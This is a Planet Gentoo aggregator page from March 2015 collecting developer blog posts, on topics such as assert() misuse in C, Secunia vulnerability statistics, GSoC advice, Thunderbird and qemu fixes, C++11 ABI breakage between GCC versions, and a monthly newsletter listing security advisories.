
. Aaron W. Swenson
. Agostino Sarubbo
. Alec Warner
. Alex Alexander
. Alex Legler
. Alexey Shvetsov
. Alexis Ballier
. Alexys Jacob
. Amadeusz Żołnowski
. Andreas K. Hüttel
. Andreas Proschofsky
. Anthony Basile
. Arun Raghavan
. Bernard Cafarelli
. Bjarke Istrup Pedersen
. Brent Baude
. Brian Harring
. Christian Faulhammer
. Christian Ruppert
. Christopher Harvey
. Chí-Thanh Christopher Nguyễn
. Daniel Gryniewicz
. David Abbott
. Denis Dupeyron
. Detlev Casanova
. Diego E. Pettenò
. Domen Kožar
. Donnie Berkholz
. Doug Goldstein
. Eray Aslan
. Fabio Erculiani
. Gentoo Haskell Herd
. Gentoo Monthly Newsletter
. Gentoo News
. Gilles Dartiguelongue
. Greg KH
. Hanno Böck
. Hans de Graaff
. Ian Whyman
. Ioannis Aslanidis
. Jan Kundrát
. Jason Donenfeld
. Jauhien Piatlicki
. Jeffrey Gardner
. Jeremy Olexa
. Joachim Bartosik
. Johannes Huber
. Jonathan Callen
. Jorge Manuel B. S. Vicetto
. Joseph Jezak
. Kenneth Prugh
. Kristian Fiskerstrand
. Lance Albertson
. Liam McLoughlin
. LinuxCrazy Podcasts
. Luca Barbato
. Luis Francisco Araujo
. Mark Loeser
. Markos Chandras
. Mart Raudsepp
. Matt Turner
. Matthew Marlowe
. Matthew Thode
. Matti Bickel
. Michael Palimaka
. Michal Hrusecky
. Michał Górny
. Mike Doty
. Mike Gilbert
. Mike Pagano
. Nathan Zachary
. Ned Ludd
. Nirbheek Chauhan
. Pacho Ramos
. Patrick Kursawe
. Patrick Lauer
. Patrick McLean
. Pavlos Ratis
. Paweł Hajdan, Jr.
. Petteri Räty
. Piotr Jaroszyński
. Rafael Goncalves Martins
. Raúl Porcel
. Remi Cardona
. Richard Freeman
. Robin Johnson
. Ryan Hill
. Sean Amoss
. Sebastian Pipping
. Steev Klimaszewski
. Stratos Psomadakis
. Sune Kloppenborg Jeppesen
. Sven Vermeulen
. Sven Wegener
. Theo Chatzimichos
. Thomas Kahle
. Tiziano Müller
. Tobias Heinlein
. Tobias Klausmann
. Tom Wijsman
. Tomáš Chvátal
. Victor Ostorga
. Vikraman Choudhury
. Vlastimil Babka
. Zack Medico

Last updated:
March 29, 2015, 23:03 UTC

Views expressed in the content published here do not necessarily represent the views of Gentoo Linux or the Gentoo Foundation.

Bugs? Comments? Suggestions? Contact us!

Powered by:
Planet Venus

Welcome to Planet Gentoo, an aggregation of Gentoo-related weblog articles written by Gentoo developers. For a broader range of topics, you might be interested in Gentoo Universe.

March 27, 2015
Luca Barbato a.k.a. lu_zero (homepage, bugs)
Again on assert() (March 27, 2015, 12:25 UTC)

Since apparently there are still people not reading the fine man page.

If the macro NDEBUG was defined at the moment <assert.h> was last included, the macro assert() generates no code, and hence does nothing at all.
Otherwise, the macro assert() prints an error message to standard error and terminates the program by calling abort(3) if expression is false (i.e., compares equal to zero).
The purpose of this macro is to help the programmer find bugs in his program. The message "assertion failed in file foo.c, function do_bar(), line 1287" is of no help at all to a user.

I guess it is time to return to security and expand a bit on which are good practices and which are misguided ideas that should be eradicated, to reduce the amount of Denial of Service waiting to happen.

Security issues

The term “security issue” covers a lot of different kinds of situations. Usually unhandled paths in the code lead to memory corruption, memory leaks, crashes and other less evident problems such as information leaks.

I’m focusing on crashes today; assuming the others are usually more annoying or dangerous may or may not be true depending on the scenario:

If you are watching a movie and a glitch in the bitstream makes the application leak some memory, you would not care at all as long as you can enjoy your movie. If the same glitch makes VLC close suddenly a second before you get to see who is the mastermind behind a really twisted plot… I guess you’ll scream at whoever thought it was a good idea to crash there.

If a glitch might let an attacker run arbitrary code while you are watching your movie, you’d probably prefer your player to just crash instead.

It is a false dichotomy, since what you want is to have the glitch handled properly and to keep watching the rest of the movie, without VLC crashing and leaving you no meaningful information about what happened.

Errors must be handled, trading a crash for something else you consider worse is just being naive.

What is assert exactly?

assert is a debugging facility mandated by POSIX, C89 and C99. It is a macro that more or less looks like this:

#define assert(condition)                              \
    if (condition) {                                   \
        do_nothing();                                  \
    } else {                                           \
       fprintf(stderr, "%d %s", __LINE__, __func__);   \
       abort();                                        \
    }

If the condition does not hold, crash. Here is the real-life version from musl:

#define assert(x) ((void)((x) || (__assert_fail(#x, __FILE__, __LINE__, __func__),0)))

How to use it

Asserts should be used to verify assumptions. While developing they help you verify whether your
assumptions meet reality. If not, they tell you that you should investigate, because something is
clearly wrong. They are not intended to be used in release builds.
- some wise Federico while talking about another language's asserts

Usually when you write some code you might do something like this to make sure you aren’t doing anything wrong. You start with:

int my_function_doing_difficult_computations(Structure *s)
{
   int a = some_computation(s);
   int b = other_operations(a, s);
   int c = some_input(s, b);
   int idx = some_operation(a, b, c);

   return some_lut[idx];
}

Where idx is a signed integer, and a, b and c have ranges that might or might not depend on some external input.

You do not want idx to fall outside the range of the lookup table array some_lut, and you are not so sure it can’t. How do you check that you aren’t getting outside the array?

When you write the code you usually iteratively improve a prototype; you can add tests to make sure every function is returning values within the expected range, and you can use assert() as a poor man's C version of proper unit testing.

If some function depends on values outside your control (e.g. an input file), you usually do validation on them and cleanly error out there. Leaving external inputs unaccounted for or, even worse, putting an assert() there is really bad.

Unit testing and assert()

We want to make sure our function works fine, let’s make a really tiny test.

void test_some_computation(void)
{
    Structure *s = NULL;
    int i;
    while (input_generator(&s, i)) {
        int a = some_computation(s);
        assert(a > 0 && a < 10);
    }
}

It is compact and you can then run your test under gdb and inspect a bit around. Quite good if you are refactoring the innards of some_computation() and you want to be sure you did not consider some corner case.

Here assert() is quite nice, since we can pack the testcase into a single line and get a simple report if something goes wrong. We could do better though, since assert does not tell us the offending value or how we ended up there.

You might not be that thorough, and you might just decide to put the same assert inside your function and check there, assuming you cover the whole input space properly using regression tests.

To crash or not to crash

The people who consider it OK to crash at runtime (remember the sad user who cannot watch his wonderful movie till the end?) suggest leaving the assert enabled at runtime.

If you consider the example above, would it be better to crash than to read a random value from memory? Again, this is a false dichotomy!

You can expect failures, e.g. broken bitstreams, and for those you just want to check and return a proper failure message.

In our case, some_input()'s return value should be checked for failures, and the failure forwarded further up to the library user, who will then decide what to do.

Now remains the access to the lookup table. If you didn’t check the other functions sufficiently, you might get a bogus index, and with a bogus index you will read from random memory (crashing or not depending on whether that address is mapped into the program). Do you want an assert() there? Or would you rather add another normal check with a normal failure path?

A correct answer is to test your code enough that you do not need to add yet another check; in fact, if the problem arises, it is wrong to add a check there, or, even worse, an assert(). You should just go up the execution path and fix the problem where it is: a non-validated input, a wrong “optimization” or something sillier.

There is open debate on whether having assert() enabled is good or bad practice when talking about defensive design. In C, in my opinion, it is a complete misuse. If you want to litter your release code with tons of branches, you can also spend the time to implement something better and make sure to clean up correctly. Calling abort() can leave your input and output in a severely inconsistent state.

How to use it the wrong way

I want to trade a crash anytime the alternative is memory corruption
- some misguided guy

Assume you have something like this:

int size = some_computation(s);
uint8_t *p;
uint8_t *buf = p = malloc(size);

while (some_related_computations(s)) {
   do_stuff_(s, p);
   p += 4;
}

assert(p - buf == size);

If some_computation() and some_related_computations() do not agree, you might write past the allocated buffer! The naive person above starts talking about how the memory is corrupted by do_stuff_() and horrible things (e.g. foreign code execution) could happen without the assert(), and how even calling return at that point is terrible and would lead to horrible, horrible things.

Ok, NO. Stop NOW. Go up and look at how assert is implemented. If you check at that point that something went wrong, the corruption has already happened. No matter what you do, somebody could exploit it, depending on how naive or unlucky you have been.

Remember: assert() does do I/O, allocates memory, raises a signal and calls functions. All that you would rather not do when your memory is corrupted is done by assert().

You can be less naive.

int size = some_computation(s);
uint8_t *p;
uint8_t *buf = p = malloc(size);

while (some_related_computations(s) && size >= 4) {
   do_stuff_(s, p);
   p    += 4;
   size -= 4;
}

assert(size == 0);

But then, instead of the assert you can just add

if (size != 0) {
    msg("Something went really wrong!");
    log("The state is %p", s->some_state);
    goto fail;
}

This way, when the “impossible” happens, the user gets a proper notification, you can recover cleanly, and no memory corruption ever happens.

Better than assert

Albeit easy to use and portable, assert() does not provide much information. There are plenty of tools that can be leveraged to get better reporting.

In Closing

assert() is a really nice debugging tool and it helps a lot to make sure some state remains invariant while refactoring.

Leaving asserts in release code, on the other hand, is quite wrong: it does not give you any additional safety. Please do not buy the fairy tale that assert() saves you from scary memory corruption issues. It does NOT.

March 26, 2015
Alex Legler a.k.a. a3li (homepage, bugs)
On Secunia’s Vulnerability Review 2015 (March 26, 2015, 19:44 UTC)

Today, Secunia have released their Vulnerability Review 2015, including various statistics on security issues fixed in the last year.

If you don’t know about Secunia’s services: They aggregate security issues from various sources into a single stream, or as they call it: they provide vulnerability intelligence.
In the past, this intelligence was available to anyone in a free newsletter or on their website. Recent changes however caused much of the useful information to go behind login and/or pay walls. This circumstance has also forced us at the Gentoo Security team to cease using their reports as references when initiating package updates due to security issues.

Coming back to their recently published document, there is one statistic that is of particular interest: Gentoo is listed as having the third largest number of vulnerabilities in a product in 2014.

from Secunia: Secunia Vulnerability Review 2015

Looking at the whole table, you’d expect at least one other Linux distribution with a similarly large pool of available packages, but you won’t find any.

So is Gentoo less secure than other distros? tl;dr: No.

As Secunia’s website does not let me see the actual “vulnerabilities” they have counted for Gentoo in 2014, there’s no way to actually find out how these numbers came into place. What I can see though are “Secunia advisories” which seem to be issued more or less for every GLSA we send. Comparing the number of posted Secunia advisories for Gentoo to those available for Debian 6 and 7 tells me something is rotten in the state of Denmark (scnr):
While there were 203 Secunia advisories posted for Gentoo in the last year, Debian 6 and 7 had 55 and 249 respectively, yet Debian would have to have fixed fewer than 105 vulnerabilities in those (55+249=) 304 advisories to be at least rank 21 and thus not be included in the table above. That doesn’t make much sense. Maybe issues in Gentoo’s packages are counted for the distribution as well, no idea.

That aside, 2014 was a good year in terms of security for Gentoo: The huge backlog of issues waiting for an advisory was heavily reduced as our awesome team managed to clean up old issues and make them known to glsa-check in three wrap-up advisories—and then we also issued 239 others, more than ever since 2007. Thanks to everyone involved!

March 18, 2015
Jan Kundrát a.k.a. jkt (homepage, bugs)

It is that time of the year again, and people are applying for Google Summer of Code positions. It's great to see a big crowd of newcomers. This article explains what sort of students are welcome in GSoC from the point of view of Trojitá, a fast Qt IMAP e-mail client. I suspect that many other projects within KDE share my views, but it's best to ask them. Hopefully, this post will help students understand what we are looking for, and assist in deciding what project to work for.

Finding a motivation

As a mentor, my motivation in GSoC is pretty simple — I want to attract new contributors to the project I maintain. This means that I value long-term sustainability above fancy features. If you are going to apply with us, make sure that you actually want to stick around. What happens when GSoC terminates? What happens when GSoC terminates and the work you've been doing is not ready yet? Do you see yourself continuing the work you've done so far? Or is it going to become an abandonware, with some cash in your pocket being your only reward? Who is going to maintain the code which you worked hard to create?

Selecting an area of work

This is probably the most important aspect of your GSoC involvement. You're going to spend three months of full time activity on some project, a project you might have not heard about before. Why are you doing this — is it only about the money, or do you already have a connection to the project you've selected? Is the project trying to solve a problem that you find interesting? Would you use the results of that project even without the GSoC?

My experience shows that it's best to find a project which fills a niche that you find interesting. Do you have a digital camera, and do you think that a random photo editor's interface sucks? Work on that, make the interface better. Do you love listening to music? Maybe your favorite music player has some annoying bug that you could fix. Maybe you could add a feature to, say, synchronize the playlist with your cell phone (this is just an example, of course). Do you like 3D printing? Help improve an existing software for 3D printing, then. Are you a database buff? Is there something you find lacking in, e.g., PostgreSQL?

Either way, it is probably a good idea to select something which you need to use, or want to use for some reason. It's of course fine to e.g. spend your GSoC term working on an astronomy tool even though you haven't used one before, but unless you really like astronomy, then you should probably choose something else. In case of Trojitá, if you have been using GMail's web interface for the past five years and you think that it's the best thing since sliced bread, well, chances are that you won't enjoy working on a desktop e-mail client.

Pick something you like, something which you enjoy working with.

Making a proposal

An excellent idea is to make yourself known in advance. This does not happen by joining the IRC channel and saying "I want to work on GSoC", or mailing us to let us know about this. A much better way of getting involved is through showing your dedication.

Try to play with the application you are about to apply for. Do you see some annoying bug? Fix it! Does it work well? Use the application more; you will find bugs. Look at the project's bug tracker, maybe there are some issues which people are hitting. Do you think that you can fix it? Diving into bug fixing is an excellent opportunity to get yourself familiar with the project's code base, and to make sure that our mentors know the style and pace of your work.

Now that you have some familiarity with the code, maybe you can already see opportunities for work besides what's already described on the GSoC ideas wiki page. That's fine — the best proposals usually come from students who have found them on their own. The list of ideas is just that, a list of ideas, not an exhaustive cookbook. There's usually much more that can be done during the course of the GSoC. What would be the most interesting area for you? How does it fit into the bigger picture?

After you've thought about the area to work on, now it's time to write your proposal. Start early, and make sure that you talk about your ideas with your prospective mentors before you spend three hours preparing a detailed roadmap. Define the goals that you want to achieve, and talk with your mentors about them. Make sure that the work fits well with the length and style of the GSoC.

And finally, be sure that you stay open and honest with your mentoring team. Remember, this is not a contest of writing the best project proposal. For me, GSoC is all about finding people who are interested in working on, say, Trojitá. What I'm looking for are honest, fair-behaving people who demonstrate willingness to learn new stuff. On top of that, I like to accept people with whom I have already worked. Hearing about you for the first time when I read your GSoC proposal is not a perfect way of introducing yourself. Make yourself known in advance, and show us how you can help us make our project better. Show us that you want to become a part of that "we".

Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
Upgrading ThunderBird (March 18, 2015, 02:35 UTC)

With the recent update from the LongTimeSuffering / ExtendedSufferingRelease of Thunderbird from 24 to 31 we encountered some serious badness.

The best description of the symptoms would be "IMAP doesn't work at all"
On some machines the existing accounts had disappeared, on others they would just be inert and never receive updates.

After some digging I was finally able to find the cause of this:
Too old config file.

Uhm ... what? Well - some of these accounts have been around since TB2. Some newer ones were enhanced by copying the prefs.js from existing accounts. And so there's a weird TB bug report that is mostly triggered by some bits being rewritten around Firefox 30, the config parser screwing up when translating 'old' into 'new', and ... effectively ... IMAP not being whitelisted, thus by default blacklisted, and hilarity ensues.

Should you encounter this bug you "just" need to revert to a prefs.js from before the update (sigh) and then remove all lines involving "capability.policy".
Then update and ... things work. Whew.

Why not just remove the profile and start with a clean one, you say? Well ... for one, TB gets brutally, unusably slow if you have emails. Just re-reading the mailbox content from a fast local IMAP server will take ~8h, and TB will not respond to user input during that time.
And then you manually have to go into eeeevery single subfolder so that TB remembers it is there and actually updates it. That's about one work-day per user lost to idiocy, so sed'ing the config file into compliance is the easy way out.
Thank you, Mozilla, for keeping our lives exciting!

March 17, 2015
Alexys Jacob a.k.a. ultrabug (homepage, bugs)
mongoDB 3.0.1 (March 17, 2015, 13:46 UTC)

This is a quite awaited version bump coming to portage and I’m glad to announce it’s made its way to the tree today !

I'll start by warmly thanking Tomas Mozes and Darko Luketic for their amazing help, feedback and patience!


I introduced quite some changes in this ebuild which I wanted to share with you and warn you about. MongoDB upstream have stripped quite a bunch of things out of the main mongo core repository, which I have in turn split into separate ebuilds.

Major changes :

  • respect upstream’s optimization flags: unless making a debug build, the user’s optimization flags will be ignored to prevent crashes and weird behaviour.
  • shared libraries for C/C++ are no longer built by the core mongo repository, so I removed the static-libs USE flag.
  • various dependency optimizations to trigger a rebuild of mongoDB when one of its linked dependencies changes.


The new tools USE flag allows you to pull in a new ebuild named app-admin/mongo-tools, which installs the commands listed below. Obviously, you can now install just this package if you only need those tools on your machine.

  • mongodump / mongorestore
  • mongoexport / mongoimport
  • mongotop
  • mongofiles
  • mongooplog
  • mongostat
  • bsondump


The MMS agent now has some real version numbers, and I don't have to host its source on Gentoo's infra box woodpecker anymore. At the moment only the monitoring agent is available; should anyone request the backup one, I'll be glad to add support for it too.


I took this opportunity to add dev-libs/mongo-cxx-driver to the tree and bump the mongo-c-driver one. Thank you to Balint SZENTE for his insight on this.

March 15, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)

We interrupt for a brief announcement:

Gentoo Linux will be represented with a booth at the Chemnitzer Linux-Tage on

Saturday, March 21 and
Sunday, March 22, 2015.

Among other things, there will be Gentoo t-shirts, lanyards and buttons to compile yourself.

Hanno Böck a.k.a. hanno (homepage, bugs)

Just wanted to quickly announce two talks I'll give in the upcoming weeks: One at BSidesHN (Hannover, 20th March) about some findings related to PGP and keyservers and one at the Easterhegg (Braunschweig, 4th April) about the current state of TLS.

A look at the PGP ecosystem and its keys

PGP-based e-mail encryption is widely regarded as an important tool to provide confidential and secure communication. The PGP ecosystem consists of the OpenPGP standard, different implementations (mostly GnuPG and the original PGP) and keyservers.

The PGP keyservers operate on an add-only basis. That means keys can only be uploaded and never removed. We can use these keyservers as a tool to investigate potential problems in the cryptography of PGP-implementations. Similar projects regarding TLS and HTTPS have uncovered a large number of issues in the past.

The talk will present a tool to parse the data of PGP keyservers and put them into a database. It will then have a look at potential cryptographic problems. The tools used will be published under a free license after the talk.

Source code
A look at the PGP ecosystem through the key server data (background paper)

Some tales from TLS

The TLS protocol is one of the foundations of Internet security. In recent years it's been under attack: Various vulnerabilities, both in the protocol itself and in popular implementations, showed how fragile that foundation is.

On the other hand, new features these days allow TLS to be used much more securely than ever before. Features like Certificate Transparency and HTTP Public Key Pinning allow us to avoid many of the security pitfalls of the Certificate Authority system.

March 11, 2015
Denis Dupeyron a.k.a. calchan (homepage, bugs)
/bin/sh: Argument list too long (March 11, 2015, 19:22 UTC)

I tried building binutils-2.25 in a qemu chroot and I got the following error during the build process:

/bin/sh: Argument list too long

Google wasn’t helpful. So I looked at the code for qemu-2.2.0, which is where my static qemu binary comes from. At some point I stumbled on this line in linux-user/qemu.h:

#define MAX_ARG_PAGES 33

I changed that 33 to 64, rebuilt, replaced the appropriate static binary in my chroot, and the error went away.

March 10, 2015
Anthony Basile a.k.a. blueness (homepage, bugs)

Gentoo allows users to have multiple versions of gcc installed and we (mostly?) support systems where userland is partially built with different versions.  There are both advantages and disadvantages to this, and in this post I’m going to talk about one of the disadvantages: the C++11 ABI incompatibility problem.  I don’t exactly have a solution, but at least we can define what the problem is and track it [1].

First, what is C++11?  It’s a new standard of C++ which is just now making its way through GCC and clang as experimental.  The current default standard is C++98, which you can verify by just reading the defined value of __cplusplus using the preprocessor.

$  g++ -x c++ -E -P - <<< __cplusplus
$  g++ -x c++ --std=c++98 -E -P - <<< __cplusplus
$  g++ -x c++ --std=c++11 -E -P - <<< __cplusplus

This shouldn’t be surprising, even good old C has standards:

$ gcc -x c -std=c90 -E -P - <<< __STDC_VERSION__
$ gcc -x c -std=c99 -E -P - <<< __STDC_VERSION__
$ gcc -x c -std=c11 -E -P - <<< __STDC_VERSION__

We’ll leave the interpretation of these values as an exercise to the reader.  [2]

The specs for these different standards at least allow for different syntax and semantics in the language.  So here’s an example of how C++98 and C++11 differ in this respect:

// I build with both --std=c++98 and --std=c++11
#include <iostream>
using namespace std;
int main() {
    int i, a[] = { 5, -3, 2, 7, 0 };
    for (i = 0; i < sizeof(a)/sizeof(int); i++)
        cout << a[i] << endl;
    return 0;
}
// I build with only --std=c++11
#include <iostream>
using namespace std;
int main() {
    int a[] = { 5, -3, 2, 7, 0 };
    for (auto& x : a)
        cout << x << endl;
    return 0;
}

I think most people would agree that the C++11 way of iterating over arrays (or other objects like vectors) is sexy.  In fact C++11 is filled with sexy syntax, especially when it comes to threading and atomics, and so coders are seduced.  This is an upstream choice and it should be reflected in their build system, with --std= sprinkled where needed.  I hope you see why you should never add --std= to your CFLAGS or CXXFLAGS.

The syntactic/semantic differences are the first “incompatibility”, and they are really not our problem downstream.  Our problem in Gentoo comes from ABI incompatibilities between the two standards, arising from two sources: 1) Linking between objects compiled with --std=c++98 and --std=c++11 is not guaranteed to work.  2) Neither is linking between objects both compiled with --std=c++11 but with different versions of GCC differing in their minor release number.  (The minor release number is x in gcc-4.x.y.)

To see this problem in action, let’s consider the following little snippet of code which uses a C++11-only function [3]:

#include <chrono>
using namespace std;
int main() {
    auto x = chrono::steady_clock::now;
}

Now if we compile that with gcc-4.8.3 and check its symbols we get the following:

$ g++ --version
g++ (Gentoo Hardened 4.8.3 p1.1, pie-0.5.9) 4.8.3
$ g++ --std=c++11 -c test.cpp
$ readelf -s test.o
Symbol table '.symtab' contains 12 entries:
Num:    Value          Size Type    Bind   Vis      Ndx Name
  0: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND
  1: 0000000000000000     0 FILE    LOCAL  DEFAULT  ABS test.cpp
  2: 0000000000000000     0 SECTION LOCAL  DEFAULT    1
  3: 0000000000000000     0 SECTION LOCAL  DEFAULT    3
  4: 0000000000000000     0 SECTION LOCAL  DEFAULT    4
  5: 0000000000000000     0 SECTION LOCAL  DEFAULT    6
  6: 0000000000000000     0 SECTION LOCAL  DEFAULT    7
  7: 0000000000000000     0 SECTION LOCAL  DEFAULT    5
  8: 0000000000000000    78 FUNC    GLOBAL DEFAULT    1 main
 10: 0000000000000000     0 NOTYPE  GLOBAL DEFAULT  UND _ZNSt6chrono3_V212steady_
 11: 0000000000000000     0 NOTYPE  GLOBAL DEFAULT  UND __stack_chk_fail

We can now confirm that that symbol is in fact in libstdc++.so.6 for 4.8.3 but NOT for 4.7.3 as follows:

$ readelf -s /usr/lib/gcc/x86_64-pc-linux-gnu/4.8.3/libstdc++.so.6 | grep _ZNSt6chrono3_V212steady_
  1904: 00000000000e5698     1 OBJECT  GLOBAL DEFAULT   13 _ZNSt6chrono3_V212steady_@@GLIBCXX_3.4.19
  3524: 00000000000c8b00    89 FUNC    GLOBAL DEFAULT   11 _ZNSt6chrono3_V212steady_@@GLIBCXX_3.4.19
$ readelf -s /usr/lib/gcc/x86_64-pc-linux-gnu/4.7.3/libstdc++.so.6 | grep _ZNSt6chrono3_V212steady_

Okay, so we’re just seeing an example of things in flux.  Big deal?  If you finish linking test.cpp and check what it links against, you get what you expect:

$ g++ --std=c++11 -o test.gcc48 test.o
$ ./test.gcc48
$ ldd test.gcc48
        linux-vdso.so.1 (0x000002ce333d0000)
        libstdc++.so.6 => /usr/lib/gcc/x86_64-pc-linux-gnu/4.8.3/libstdc++.so.6 (0x000002ce32e88000)
        libm.so.6 => /lib64/libm.so.6 (0x000002ce32b84000)
        libgcc_s.so.1 => /usr/lib/gcc/x86_64-pc-linux-gnu/4.8.3/libgcc_s.so.1 (0x000002ce3296d000)
        libc.so.6 => /lib64/libc.so.6 (0x000002ce325b1000)
        /lib64/ld-linux-x86-64.so.2 (0x000002ce331af000)

Here’s where the weirdness comes in.  Suppose we now switch to gcc-4.7.3 and repeat.  Things don’t quite work as expected:

$ g++ --version
g++ (Gentoo Hardened 4.7.3-r1 p1.4, pie-0.5.5) 4.7.3
$ g++ --std=c++11 -o test.gcc47 test.cpp
$ ldd test.gcc47
        linux-vdso.so.1 (0x000003bec8a9c000)
        libstdc++.so.6 => /usr/lib/gcc/x86_64-pc-linux-gnu/4.8.3/libstdc++.so.6 (0x000003bec8554000)
        libm.so.6 => /lib64/libm.so.6 (0x000003bec8250000)
        libgcc_s.so.1 => /usr/lib/gcc/x86_64-pc-linux-gnu/4.8.3/libgcc_s.so.1 (0x000003bec8039000)
        libc.so.6 => /lib64/libc.so.6 (0x000003bec7c7d000)
        /lib64/ld-linux-x86-64.so.2 (0x000003bec887b000)

Note that it says it’s linking against 4.8.3’s libstdc++.so.6 and not 4.7.3’s.  That’s because the order in which the library paths are searched is defined in /etc/ld.so.conf, and this file is sorted the way it is on purpose.  So maybe it’ll run!  Let’s try:

$ ./test.gcc47
./test.gcc47: relocation error: ./test.gcc47: symbol _ZNSt6chrono12steady_clock3nowEv, version GLIBCXX_3.4.17 not defined in file libstdc++.so.6 with link time reference

Nope, no joy.  So what’s going on?  Let’s look at the symbols in both test.gcc47 and test.gcc48:

$ readelf -s test.gcc47  | grep chrono
  9: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND _ZNSt6chrono12steady_cloc@GLIBCXX_3.4.17 (4)
 50: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND _ZNSt6chrono12steady_cloc
$ readelf -s test.gcc48  | grep chrono
  9: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND _ZNSt6chrono3_V212steady_@GLIBCXX_3.4.19 (4)
 49: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND _ZNSt6chrono3_V212steady_

Whoah!  The symbol wasn’t mangled the same way!  Looking more carefully at *all* the chrono symbols in the 4.8.3 and 4.7.3 copies of libstdc++.so.6, we see the problem.

$ readelf -s /usr/lib/gcc/x86_64-pc-linux-gnu/4.8.3/libstdc++.so.6 | grep chrono
  353: 00000000000e5699     1 OBJECT  GLOBAL DEFAULT   13 _ZNSt6chrono3_V212system_@@GLIBCXX_3.4.19
 1489: 000000000005e0e0    86 FUNC    GLOBAL DEFAULT   11 _ZNSt6chrono12system_cloc@@GLIBCXX_3.4.11
 1605: 00000000000e1a3f     1 OBJECT  GLOBAL DEFAULT   13 _ZNSt6chrono12system_cloc@@GLIBCXX_3.4.11
 1904: 00000000000e5698     1 OBJECT  GLOBAL DEFAULT   13 _ZNSt6chrono3_V212steady_@@GLIBCXX_3.4.19
 2102: 00000000000c8aa0    86 FUNC    GLOBAL DEFAULT   11 _ZNSt6chrono3_V212system_@@GLIBCXX_3.4.19
 3524: 00000000000c8b00    89 FUNC    GLOBAL DEFAULT   11 _ZNSt6chrono3_V212steady_@@GLIBCXX_3.4.19
$ readelf -s /usr/lib/gcc/x86_64-pc-linux-gnu/4.7.3/ | grep chrono
 1478: 00000000000c6260    72 FUNC    GLOBAL DEFAULT   12 _ZNSt6chrono12system_cloc@@GLIBCXX_3.4.11
 1593: 00000000000dd9df     1 OBJECT  GLOBAL DEFAULT   14 _ZNSt6chrono12system_cloc@@GLIBCXX_3.4.11
 2402: 00000000000c62b0    75 FUNC    GLOBAL DEFAULT   12 _ZNSt6chrono12steady_cloc@@GLIBCXX_3.4.17

Only 4.7.3’s libstdc++.so.6 has _ZNSt6chrono12steady_cloc@@GLIBCXX_3.4.17.  Normally when libraries change their exported symbols, they change their SONAME, but that is not the case here, as running `readelf -d` on both shows.  GCC doesn’t bump the SONAME that way for reasons explained in [4].  Great, so just switch around the search order in /etc/ld.so.conf.  Then we get the problem the other way around:

$ ./test.gcc47
$ ./test.gcc48
./test.gcc48: /usr/lib/gcc/x86_64-pc-linux-gnu/4.7.3/libstdc++.so.6: version `GLIBCXX_3.4.19' not found (required by ./test.gcc48)

So no problem if your system has only gcc-4.7.  No problem if it has only 4.8.  But if it has both, then compiling C++11 code with 4.7 while linking against the libstdc++ from 4.8 (or vice versa) gets you breakage at the binary level.  This is the C++11 ABI incompatibility problem in Gentoo.  As an exercise for the reader, fix!


[1] Bug 542482 – (c++11-abi) [TRACKER] c++11 abi incompatibility

[2] This is an old professor’s trick for saying, hey go find out why c90 doesn’t define a value for __STDC_VERSION__ and let me know, ‘cuz I sure as hell don’t!

[3] This example was inspired by bug #513386.  You can verify that it requires --std=c++11 by dropping the flag and getting yelled at by the compiler.

[4] Upstream explains why in comment #5 of GCC bug #61758.  The entire bug is dedicated to this issue.

March 07, 2015
Gentoo Monthly Newsletter: February 2015 (March 07, 2015, 20:00 UTC)

Gentoo News

Infrastructure News

Service relaunch: archives.gentoo.org

Thanks to our awesome infrastructure team, the archives.gentoo.org website is back online. Below is the announcement as posted on the gentoo-announce mailing list by Robin H. Johnson.

The Gentoo Infrastructure team is proud to announce that we have
re-engineered the mailing list archives, and re-launched it, back at
archives.gentoo.org. The prior Mhonarc-based system had numerous
problems, and a complete revamp was deemed the best solution to
move forward with. The new system is powered by ElasticSearch
(more features to come).

All existing URLs should either work directly, or redirect you to the new location for that content.

Major thanks to a3li, for his development of this project. Note
that we're still doing some catchup on newer messages, but delays will drop to under 2 hours soon,
with an eventual goal of under 30 minutes.

Please report problems to Bugzilla: Product Websites, Component
Archives [1][2]

Source available at:
git:// (backend)
git:// (frontend)


Gentoo Developer Moves


Gentoo is made up of 235 active developers, of which 33 are currently away.
Gentoo has recruited a total of 808 developers since its inception.



  • James Le Cuirot joined the Java team
  • Guilherme Amadio joined the Fonts team
  • Mikle Kolyada joined the Embedded team
  • Pavlos Ratis joined the Overlays team
  • Matthew Thode joined the Git mirror team
  • Patrice Clement joined the Java and Python teams
  • Manuel Rüger joined the QA team
  • Markus Duft left the Prefix team
  • Mike Gilbert left the Vmware team
  • Tim Harder left the Games and Tex teams


This section summarizes the current state of the Gentoo ebuild tree.

Architectures 45
Categories 164
Packages 17997
Ebuilds 36495
Architecture Stable Testing Total % of Packages
alpha 3534 687 4221 23.45%
amd64 10983 6536 17519 97.34%
amd64-fbsd 2 1589 1591 8.84%
arm 2687 1914 4601 25.57%
arm64 536 93 629 3.50%
hppa 3102 535 3637 20.21%
ia64 3105 707 3812 21.18%
m68k 592 135 727 4.04%
mips 0 2439 2439 13.55%
ppc 6748 2536 9284 51.59%
ppc64 4329 1074 5403 30.02%
s390 1364 469 1833 10.19%
sh 1466 610 2076 11.54%
sparc 4040 994 5034 27.97%
sparc-fbsd 0 315 315 1.75%
x86 11560 5583 17143 95.25%
x86-fbsd 0 3235 3235 17.98%



The following GLSAs have been released by the Security Team:

GLSA Package Description Bug
201502-15 net-fs/samba Samba: Multiple vulnerabilities 479868
201502-14 sys-apps/grep grep: Denial of Service 537046
201502-13 www-client/chromium Chromium: Multiple vulnerabilities 537366
201502-12 dev-java/oracle-jre-bin (and 2 more) Oracle JRE/JDK: Multiple vulnerabilities 507798
201502-11 app-arch/cpio GNU cpio: Multiple vulnerabilities 530512
201502-10 media-libs/libpng libpng: User-assisted execution of arbitrary code 531264
201502-09 app-text/antiword Antiword: User-assisted execution of arbitrary code 531404
201502-08 media-video/libav Libav: Multiple vulnerabilities 492582
201502-07 dev-libs/libevent libevent: User-assisted execution of arbitrary code 535774
201502-06 www-servers/nginx nginx: Information disclosure 522994
201502-05 net-analyzer/tcpdump tcpdump: Multiple vulnerabilities 534660
201502-04 www-apps/mediawiki MediaWiki: Multiple vulnerabilities 498064
201502-03 net-dns/bind BIND: Multiple Vulnerabilities 531998
